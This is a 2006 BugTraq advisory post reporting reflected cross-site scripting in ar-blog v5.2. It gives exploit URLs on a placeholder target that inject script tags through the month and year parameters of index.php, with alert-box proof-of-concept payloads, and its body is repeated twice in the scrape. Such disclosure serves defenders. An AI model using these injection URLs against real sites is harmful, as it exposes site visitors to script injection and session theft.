BugTraq
Back to list
|
Post reply
-2- [XSS] in ar-blog v 5.2
Jan 18 2006 01:52PM
s3ude hotmail com
Software: ar-blog
Web Site: http://www.ar-blog.com
Versions: ar-blog v 5.2
Type: Cross Site Scripting
Class: Remote
Exploit :
1-
http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all
=9
2-
http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9
Example :
1-
http://www.target.com/index.php?page=showtopis&month=<script>alert("www.
LeZr.Com")</script>
2-
http://www.target.com/index.php?page=showtopis&month=9&year=<script>aler
t("www.LeZr.Com")</script>&all=9
Discovered by: SAUDI
L-G-H Team
http://www.lezr.com
Regards ///
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Web Site: http://www.ar-blog.com
Versions: ar-blog v 5.2
Type: Cross Site Scripting
Class: Remote
Exploit :
1-
http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all
=9
2-
http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9
Example :
1-
http://www.target.com/index.php?page=showtopis&month=<script>alert("www.
LeZr.Com")</script>
2-
http://www.target.com/index.php?page=showtopis&month=9&year=<script>aler
t("www.LeZr.Com")</script>&all=9
Discovered by: SAUDI
L-G-H Team
http://www.lezr.com
Regards ///
[ reply ]